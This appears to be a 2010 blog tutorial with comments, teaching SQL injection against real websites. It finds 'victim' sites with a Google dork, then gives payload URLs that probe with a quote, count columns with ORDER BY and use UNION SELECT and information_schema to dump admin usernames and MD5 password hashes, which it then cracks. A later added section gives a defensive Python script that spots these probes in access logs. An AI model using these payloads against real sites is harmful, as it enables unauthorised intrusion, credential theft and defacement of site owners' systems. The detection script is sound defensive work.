Keywords you should know:
Google Dork to use: "inurl:news.php?id="
Characters: ', -
Comments: /*, --
INFORMATION:
- "information_schema" only works on MySQL version 5.x and above.
- "information_schema" does not work on MySQL version 4.x.xx and below.
Go to www.google.com and search for the victim site with that dork.
Step 1
[site]/news.php?id=1
--- Add the character ' at the end of the URL of any site to find out whether the site is vulnerable to SQL injection or not.
Example :
[site]/news.php?id=1'
or
[site]/news.php?id=-1
Example of the error that comes out:
Warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
Step 2
Find how many tables there are in the database.
--- Put +order+by+1-- at the end of the URL.
Example :
[site]/news.php?id=1+order+by+1--
or
[site]/news.php?id=1+order+by+1/* Check it step by step
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/* Until an error comes out on the page.
[site]/news.php?id=1+order+by+4/* The error came out at table number 4!
So for this tutorial, the total number of tables in the database for the site is 3.
Step 3
Use the UNION SELECT command with the sequence of tables obtained in the second step to retrieve the numbers that we will use later. In the present case, the sequence of numbers runs up to three tables.
--- Command to be used: +union+select+1,2,3--
Example :
[site]/news.php?id=1+union+select+1,2,3--
The figure 2 pops out on the page.
--- Then we put version() in place of that figure 2,
Example :
[site]/news.php?id=1+union+select+1,version(),3--
and the version will appear in place of the figure on the page.
Example :
5.1.47-community-log
INFORMATION:
user() = gets the username used with the database
(Example: mae21@localhost)
database() = gets the database name
(Example: mae21_db)
version() = gets their MySQL version
(Example: 5.1.47-community-log)
Step 4
To retrieve all table names on the site, use this command
table_name
--- Put it in place of the number (2) that came out earlier.
+from+information_schema.tables--
--- Put it at the end of the URL.
Example :
[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
Step 5
Copy out all the table names contained in the database in one go.
group_concat(table_name)
--- Put it in place of the number (2) that came out earlier.
+from+information_schema.tables+where+table_schema=database()--
--- Put it at the end of the URL.
Example :
[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--
Step 6
Extract the existing content (column names) of the TABLE
group_concat(column_name)
--- Put it in place of the number (2) that came out earlier.
+from+information_schema.columns+where+table_name=0xHEXA--
(PUT THE TABLE NAME ALREADY CONVERTED TO HEXADECIMAL)
INFORMATION:
Website that can be used to convert the table name to hexadecimal.
Example:
The table we will use for this example is ADMIN.
When converted, the result is 41444D494E
[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E--
Step 7
Extract the contents of the columns we have obtained from the table ADMIN
concat_ws(0x3a,"column names contained in the ADMIN table")
--- Put it in place of the number (2) that came out earlier.
+from+Admin--
--- Use the table's original name
Example :
[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--
And we will get the admin username and password data for the website.
The information coming out is as follows :
"webmaster admin:8dded6912a401ad44ec9b688fd124e22"
Decrypt the MD5 hash obtained above at www.md5decrypter.co.uk
8dded6912a401ad44ec9b688fd124e22 = "iluvmyself" (decrypted!)
Now you have the username and password for the website.
Step 8 (Last Step)
Find the admin login page..
"Happy trying it and enjoy hacking for education ..." :)
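From the defender's side, the probes walked through above leave a recognisable trail in the web server's access log. The following Python script is an added example, not part of the original tutorial: it tags each request with the technique it matches (the ' probe, the ORDER BY ladder, UNION SELECT, information_schema lookups and 0x hex literals), groups the hits per client, and flags the 1, 2, 3, ... ORDER BY sequence from Step 2 (which in fact counts the columns of the vulnerable query rather than the tables in the database). The log lines, IP addresses and signature names are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from any real site); the query strings
# mirror the probes this tutorial walks through, as a web server would log them.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Dec/2010:13:01:09 +0800] "GET /news.php?id=1' HTTP/1.1" 200 612
203.0.113.7 - - [17/Dec/2010:13:01:20 +0800] "GET /news.php?id=1+order+by+1-- HTTP/1.1" 200 5120
203.0.113.7 - - [17/Dec/2010:13:01:25 +0800] "GET /news.php?id=1+order+by+2-- HTTP/1.1" 200 5120
203.0.113.7 - - [17/Dec/2010:13:01:31 +0800] "GET /news.php?id=1+order+by+3-- HTTP/1.1" 200 5120
203.0.113.7 - - [17/Dec/2010:13:01:36 +0800] "GET /news.php?id=1+order+by+4-- HTTP/1.1" 200 612
203.0.113.7 - - [17/Dec/2010:13:02:10 +0800] "GET /news.php?id=1+union+select+1,version(),3-- HTTP/1.1" 200 5140
203.0.113.7 - - [17/Dec/2010:13:03:44 +0800] "GET /news.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E-- HTTP/1.1" 200 5200
198.51.100.4 - - [17/Dec/2010:13:05:00 +0800] "GET /news.php?id=2 HTTP/1.1" 200 4990
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+|-)')
# (label, regex over the URL-decoded query string), one per technique on the page.
SIGNATURES = [
    ("quote_probe", re.compile(r"=\S*'")),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
]
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.I)

def tag_request(path):
    """Return the signature labels matched by one request path (query decoded)."""
    query = unquote_plus(path.partition("?")[2])
    return [label for label, rx in SIGNATURES if rx.search(query)]

def analyze(log_text):
    """Group flagged requests per client IP, keeping the ORDER BY values tried."""
    report = defaultdict(lambda: {"labels": set(), "order_by_values": []})
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        path = m.group(2)
        labels = tag_request(path)
        if not labels:
            continue  # ordinary traffic such as /news.php?id=2 is not recorded
        report[m.group(1)]["labels"].update(labels)
        report[m.group(1)]["order_by_values"].extend(
            int(v) for v in ORDER_BY_RE.findall(unquote_plus(path)))
    return dict(report)

def is_column_count_ladder(values):
    """True when ORDER BY N was tried as 1, 2, 3, ... in sequence (the Step 2 probe)."""
    return len(values) >= 3 and values == list(range(1, len(values) + 1))
```

Run against the constructed log, `analyze` reports only 203.0.113.7, with all five labels and the ORDER BY values [1, 2, 3, 4], which `is_column_count_ladder` flags; the ordinary request from 198.51.100.4 produces no entry.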

December 17, 2010 at 1:12 PM
hmm.. this is interesting
December 17, 2010 at 4:53 PM
thank you for responding, and congratulations on having successfully become a defacer.. :)